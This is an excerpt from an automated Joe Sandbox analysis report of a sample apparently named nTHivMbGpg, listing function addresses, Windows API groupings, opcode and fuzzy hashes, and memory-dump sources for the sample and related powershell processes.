                                                                                                                • String ID:
                                                                                                                • API String ID: 1214682469-0
                                                                                                                • Opcode ID: 59effaab94a793ca2fbdf558991555ed1e090edb450195feb7077b6de0fa885d
                                                                                                                • Instruction ID: cc11a3ce7e90a7a21670b6ae361cec1e86410a3c63ec30402b294077383dbde1
                                                                                                                • Opcode Fuzzy Hash: 59effaab94a793ca2fbdf558991555ed1e090edb450195feb7077b6de0fa885d
                                                                                                                • Instruction Fuzzy Hash: 55111231A08B45C6EB104B11B504279BA60FB89BE5F488634DF6D877D5EF3EE5408A80
                                                                                                                Function 00007FF6FD217EA0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Char$Prev$Next
                                                                                                                • String ID:
                                                                                                                • API String ID: 3260447230-0
                                                                                                                • Opcode ID: 7302f258e324082df56eb9e906256855f42b6e92faf740384e3aaa5bd17368a5
                                                                                                                • Instruction ID: 59101deadafa39417c5e9e5bc2ff1f13c5b15197146197c9a11cb48003e5a02c
                                                                                                                • Opcode Fuzzy Hash: 7302f258e324082df56eb9e906256855f42b6e92faf740384e3aaa5bd17368a5
                                                                                                                • Instruction Fuzzy Hash: 1F115462A086C185FB514B15A604179BAD1A789FE4F48D270DB7EC37C5FF2DA84087C1
                                                                                                                Function 00007FF6FD2188C8 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                • String ID:
                                                                                                                • API String ID: 140117192-0
                                                                                                                • Opcode ID: 2ccba7e9cb8161b6830b4bdced448ba4434f463bc3dcbbf20418d4b2244445be
                                                                                                                • Instruction ID: 044cf7c3729078dfd4beecaa7a26bd492a21cefd20f908af8cf144c05763418e
                                                                                                                • Opcode Fuzzy Hash: 2ccba7e9cb8161b6830b4bdced448ba4434f463bc3dcbbf20418d4b2244445be
                                                                                                                • Instruction Fuzzy Hash: DE21B039908B4682E7008B58F980369B3A4FB84B44F608136DAADC37A4FF7EE044D7C0
                                                                                                                Function 00007FF6FD213C80 Relevance: 6.0, APIs: 4, Instructions: 43windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 2776232527-0
                                                                                                                • Opcode ID: 0e89c7557f5549cdd1f7fcb2b8838b8889091e68e9dc0b1ab03ce0efe7400e88
                                                                                                                • Instruction ID: 3bc90547298ab5f670fa3eef513c117e9d19b475700e9448d922305d35983312
                                                                                                                • Opcode Fuzzy Hash: 0e89c7557f5549cdd1f7fcb2b8838b8889091e68e9dc0b1ab03ce0efe7400e88
                                                                                                                • Instruction Fuzzy Hash: 24113732618642C7F7609F20E584B76AA91FB99745F44D134DB6AC29C4FF3EE148CB80

                                                                                                                Executed Functions

                                                                                                                Function 00007FFAACB137B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1322837293.00007FFAACB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaacb10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                • Instruction ID: 66bd3851c009b8cb0ca557d91c266c57adb4f027c58b4d60d621eb615d728138
                                                                                                                • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                • Instruction Fuzzy Hash: EE01677111CB0D8FDB44EF0CE451AA6B7E0FB99364F10056DE58AC3691D736E882CB45

                                                                                                                Executed Functions

                                                                                                                Function 00007FFAACC11546 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.1297087463.00007FFAACC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_7ffaacc10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Ph7
                                                                                                                • API String ID: 0-1163285174
                                                                                                                • Opcode ID: ff28976fc670ed3931281d460c340bd9166d8f5581a62c49fd7dfa3ed894ff91
                                                                                                                • Instruction ID: 71cad036612b9425456a36367915d77f9a0c65fe1a2adb6ab347d4c23bf00fe2
                                                                                                                • Opcode Fuzzy Hash: ff28976fc670ed3931281d460c340bd9166d8f5581a62c49fd7dfa3ed894ff91
                                                                                                                • Instruction Fuzzy Hash: BF7126A190EBC98FE3569B2858255647FE0EF57225B0941FFD08DCB1A3E9199C09C392
                                                                                                                Function 00007FFAACC11191 Relevance: .4, Instructions: 427COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.1297087463.00007FFAACC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_7ffaacc10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8740422c00d7edaf58b723b5f6ef9c91cce36fd043eb9c414cda97e2369ecf17
                                                                                                                • Instruction ID: 1b6fe66625ef0b9fb1a9fb3641bd8f01e1ca678ac110a24ba49475ec39497e30
                                                                                                                • Opcode Fuzzy Hash: 8740422c00d7edaf58b723b5f6ef9c91cce36fd043eb9c414cda97e2369ecf17
                                                                                                                • Instruction Fuzzy Hash: B4D12662A0EACA8FF7959F2948155B97BE1EF56320B4801BAD44EC75D3DE1CEC088381
                                                                                                                Function 00007FFAACC112F0 Relevance: .2, Instructions: 152COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.1297087463.00007FFAACC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_7ffaacc10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0e4858c6664cd53d2788adb5d7a684d1eef776cabee7fd27b69d2be7ef90e533
                                                                                                                • Instruction ID: 9b528f3ea6074e4626eb95436b82cc5a658048d183a0e3fb061690e26eb1fcf9
                                                                                                                • Opcode Fuzzy Hash: 0e4858c6664cd53d2788adb5d7a684d1eef776cabee7fd27b69d2be7ef90e533
                                                                                                                • Instruction Fuzzy Hash: 37412692E1FAC78FF7959B2948651B8AAD1EF52220B9801FAD44DC75D7DD1CEC088381
                                                                                                                Function 00007FFAACB44325 Relevance: .0, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.1296694598.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_7ffaacb40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                                                • Instruction ID: 26bf2a83a72f8f91c4737660cb621628dedd36e1d6145b57966be5700d36b8ca
                                                                                                                • Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                                                • Instruction Fuzzy Hash: E001677111CB0C8FD744EF0CE451AA6B7E0FB99364F10056DE58AC3651DB36E891CB45